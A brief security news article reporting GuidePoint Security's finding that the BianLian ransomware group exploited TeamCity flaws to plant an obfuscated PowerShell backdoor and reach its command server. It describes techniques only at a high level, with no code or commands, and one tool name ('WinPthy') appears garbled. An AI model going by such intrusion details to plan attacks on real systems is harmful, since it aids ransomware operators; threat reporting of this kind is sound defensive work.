BianLian Hackers Up Their Game: New Ransomware Tactics Target TeamCity Servers

March 11, 2024 – Published on The Review Hive

The BianLian ransomware group, known for its focus on extortion, has been observed exploiting vulnerabilities in JetBrains TeamCity software to deploy malicious PowerShell backdoors. This finding highlights BianLian’s ability to adapt and adopt new techniques to infiltrate target networks.

GuidePoint Security researchers discovered a recent BianLian attack that began with exploiting a vulnerability (CVE-2024-27198 or CVE-2023-42793) in a TeamCity server. This initial breach allowed the attackers to create user accounts and execute malicious commands.

Following this initial foothold, the attackers used legitimate tools like WinPthy to execute commands and BITSAdmin to deploy a malicious PowerShell script (web.ps1) along with communication tools to connect with their command and control (C2) server.

While BianLian traditionally uses custom Go-based backdoors, this instance involved a PowerShell backdoor. This backdoor, though obfuscated, was deconstructed by GuidePoint researchers. Analysis revealed functionalities similar to BianLian’s Go backdoor, including network connections, execution of commands, and asynchronous operations for stealth.

Read More HERE.